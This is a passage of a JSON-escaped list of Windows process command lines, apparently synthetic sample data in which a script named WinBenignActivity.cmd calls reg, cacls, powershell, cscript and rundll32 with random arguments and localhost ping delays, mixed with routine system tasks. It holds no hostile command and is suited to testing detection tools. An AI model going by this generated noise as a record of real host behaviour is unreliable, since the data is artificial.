c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 6 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -14404 /9352\",\"ping 127.0.0.1 -n 25 \",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 8 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -23146 /32625\",\"ping 127.0.0.1 -n 9 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 3 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -9090\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9090\\\"\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -20009 /26500\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -14236\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -15522 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32 \\\\6038\\\\18193.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -19863 c:\\\\temp\\\\5632\\\\6712.ps1\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 11 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 29 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 20 \",\"ping 127.0.0.1 -n 22 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 2 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 2 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\appidcertstorecheck.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"taskhostw.exe\",\"C:\\\\Windows\\\\system32\\\\AppHostRegistrationVerifier.exe\",\"C:\\\\Windows\\\\system32\\\\usoclient.exe StartScan\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 11 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -29451 /17352\",\"ping 127.0.0.1 -n 18 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 19 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -22746\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -22746\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -32357 /19904\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -6768\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2077 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32 \\\\557\\\\12356.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -23465 c:\\\\temp\\\\11303\\\\1053.ps1\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 14 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 30 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 16 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -22744 \",\"ping 127.0.0.1 -n 26 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 12 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 6 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 1 \",\"rundll32 \\\\28294\\\\1236.exe\",\"ping 127.0.0.1 -n 24 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -27872 c:\\\\temp\\\\25394\\\\262.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -27872 c:\\\\temp\\\\25394\\\\262.ps1\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 24 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -21672 /6837\",\"ping 127.0.0.1 -n 24 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2162\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2162\\\"\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9125 /15106\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -22743\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9472 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32 \\\\24845\\\\2750.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -30329 c:\\\\temp\\\\9676\\\\24368.ps1\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -26149 \",\"ping 127.0.0.1 -n 24 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"rundll32 \\\\32641\\\\32360.exe\",\"ping 127.0.0.1 -n 24 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -14433 c:\\\\temp\\\\8937\\\\1760.ps1\",\"ping 127.0.0.1 -n 24 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 24 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 11 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 20 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 11 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"C:\\\\Windows\\\\system32\\\\devicecensus.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\devicecensus.exe UserCxt\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\compattelrunner.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" Scan -ScheduleJob -ScanTrigger 55\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 13 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -15216 /12420\",\"ping 127.0.0.1 -n 19 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 5 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -29637\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -29637\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -30962 /15074\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -3232\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25774 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32 \\\\28790\\\\506.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9748 c:\\\\temp\\\\3830\\\\20559.ps1\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 8 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 3 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 17 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -11581 \",\"ping 127.0.0.1 -n 2 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 29 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 30 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 17 \",\"rundll32 \\\\5728\\\\16265.exe\",\"ping 127.0.0.1 -n 22 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -20225 c:\\\\temp\\\\5291\\\\16396.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -20225 c:\\\\temp\\\\5291\\\\16396.ps1\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 22 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9528 /16911\",\"ping 127.0.0.1 -n 22 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -27468\",\"ping 127.0.0.1 -n 22 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -23226 \",\"ping 127.0.0.1 -n 22 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"rundll32 \\\\5914\\\\3172.exe\",\"ping 127.0.0.1 -n 22 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -15059 c:\\\\temp\\\\32400\\\\30510.ps1\",\"ping 127.0.0.1 -n 22 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 22 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 25 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 32 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 2 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"taskhostw.exe\",\"C:\\\\Windows\\\\system32\\\\appidcertstorecheck.exe\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 16 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -981 /7488\",\"ping 127.0.0.1 -n 20 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 24 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -3759\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -3759\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -1796 /27802\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2134\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -4277 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32 \\\\25124\\\\21095.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -32665 c:\\\\temp\\\\25833\\\\20704.ps1\",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 3 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 10 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 19 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -417 \",\"ping 127.0.0.1 -n 10 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 13 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 22 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 1 \",\"rundll32 \\\\15930\\\\31294.exe\",\"ping 127.0.0.1 -n 20 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -12578 c:\\\\temp\\\\17955\\\\32530.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -12578 c:\\\\temp\\\\17955\\\\32530.ps1\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 20 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -18358 /18002\",\"ping 127.0.0.1 -n 20 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -6872\",\"ping 127.0.0.1 -n 20 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" 